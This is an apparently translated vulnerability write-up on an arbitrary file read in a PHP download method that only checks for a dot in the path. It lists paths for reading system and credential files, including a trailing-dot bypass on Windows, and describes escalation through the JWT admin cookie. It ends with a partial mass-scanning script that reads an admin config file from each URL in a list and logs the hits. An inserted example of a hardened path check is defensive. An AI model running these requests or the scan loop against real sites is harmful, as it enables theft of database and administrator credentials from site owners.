By modifying the path parameter, any file can be selected for reading: “./” represents the current directory, so the database configuration file, the current administrator account password, and similar data can be read.
This is the code of the class download in the PHP namespace Ue\tools. The class provides a static method download for downloading files. The method accepts two parameters: $filename, the path of the file to be downloaded, and $downLoadName, the file name to save as on download (optional, defaults to the original file name). The main logic of the method is as follows:
First check whether $downLoadName is empty; if it is, set it to $filename.
Check whether $filename contains “.”; if not, return false, indicating that the file type cannot be determined. This is the only validation performed on the path.
Set the response MIME type to application/octet-stream, the generic binary file type.
Open the file in read-only mode with fopen and read its contents with fread.
Close the file handle.
Determine whether the client’s HTTP_USER_AGENT contains “MSIE”. If so, set a series of response headers, including Content-Type, Content-Disposition, etc., to support downloading in the IE browser.
If it is not an IE browser, set another set of response headers.
Finally, output the file content via the exit function and end script execution.
The current environment is a Windows system, and the only check is whether $filename contains “.”, so try to read the win.ini file:
C:\Windows\win.ini
Try to read the hosts file; since the check requires a “.”, append “.” to the hosts file name.
The principle is that Windows strips trailing “.” and spaces from file names by default. If the website’s back-end filtering does not account for a trailing dot, the check can be bypassed.
C:\Windows\System32\drivers\etc\hosts.
Try to read files on a Linux system:
/etc/resolv.conf
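As an added example that is not part of the original write-up, the following Python places the weak check the download method performs (accept anything containing “.”) beside a hardened path check that refuses each of the paths shown above; DOWNLOAD_ROOT and the probe list are constructed for the example and are not values from the original project.

```python
import posixpath
from typing import Optional

# Constructed for this example: the only directory tree the endpoint may serve.
DOWNLOAD_ROOT = "/var/www/app/public/downloads"


def weak_check(filename: str) -> bool:
    """The check the page describes: accept any path that contains a dot."""
    return "." in filename


def safe_resolve(filename: str, root: str = DOWNLOAD_ROOT) -> Optional[str]:
    """Return the path to serve, or None when the request must be refused.

    Rejects absolute paths and drive letters, refuses any '..' component, and
    refuses components ending in '.' or ' ' (Windows strips those on open, so a
    raw-string check sees 'hosts.' while the kernel opens 'hosts'). Finally it
    confirms the normalised result still lies below `root`.
    """
    candidate = filename.replace("\\", "/")  # catch backslash traversal too
    if candidate.startswith("/") or ":" in candidate:
        return None
    parts = [p for p in candidate.split("/") if p not in ("", ".")]
    if not parts:
        return None
    for part in parts:
        if part == ".." or part.endswith((".", " ")):
            return None
    resolved = posixpath.normpath(posixpath.join(root, *parts))
    # Defence in depth: containment check independent of the component filter.
    if posixpath.commonpath([root, resolved]) != root:
        return None
    return resolved


if __name__ == "__main__":
    # Constructed probes: the paths discussed above plus one legitimate name.
    for probe in ("./report.pdf", "../config/admin.php",
                  r"C:\Windows\win.ini",
                  r"C:\Windows\System32\drivers\etc\hosts.", "/etc/resolv.conf"):
        print(f"{probe!r:50} weak={weak_check(probe)!s:5} safe={safe_resolve(probe)}")
```

On a real server the lexical check should be paired with realpath() on the opened file so symlinks inside the download directory cannot point outside it.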
Arbitrary file read from the front end
Try to increase the impact and escalate the vulnerability
Observe that the admcookies value in the Cookie header is a JWT (signed, not encrypted, so its payload can be base64-decoded) and try to decode it.
JWT (JSON Web Token) is an open standard for authentication and authorization. It consists of three parts: header, payload and signature.
In the given code, the parameters of the JWT are generated as follows:
Header: the algorithm HS256 (HMAC SHA-256) is used to generate the signature, represented in the code as 'alg' => 'HS256'.
Payload: contains the claims and can be customized as needed. In the code, the payload contains the following fields:
iat: the issued-at time, obtained with the time() function.
iss: the issuer of the JWT.
exp: the expiration time, the current time plus 24 hours.
nbf: the token will not be processed before this time.
sub: the subject (the user the token is issued for), defaulting to the currently requested domain name.
jti: the unique identifier of the token, generated with md5(uniqid('JWT') . time()).
claim: custom data, which can be set as needed.
Signature: the key is used to sign the header and payload. The signature algorithm is HS256, implemented by calling the self::signature() method.
Finally, the JWT token is formed by concatenating the base64-encoded header, payload and signature, separated by “.”.
    # Fragment of the original scan script: assumed to be the tail of exploit_vulnerability();
    # headers, data and vulnerable_urls are defined earlier in the original script and not shown here.
    file = requests.get(f"{url}/admin/download?path=./config/admin.php",
                        headers=headers, data=data, allow_redirects=False, verify=False)
    # "管理员配置" ("administrator configuration") is the marker string expected in admin.php
    if "管理员配置" in file.text:
        vulnerable_urls.append(url)
        print(url, file.text)
    # "存在漏洞.txt" ("vulnerable.txt") collects the affected URLs
    with open('存在漏洞.txt', 'w') as file:
        for vul_url in vulnerable_urls:
            file.write(vul_url + '\n')

# Main loop: one target URL per line in url.txt; get_session_id() and generate_payload()
# are defined earlier in the original script and not shown here.
with open('url.txt') as file:
    for url in file:
        url = url.strip()
        session_id = get_session_id(url)
        if session_id:
            token = generate_payload(url)
            exploit_vulnerability(url, session_id, token)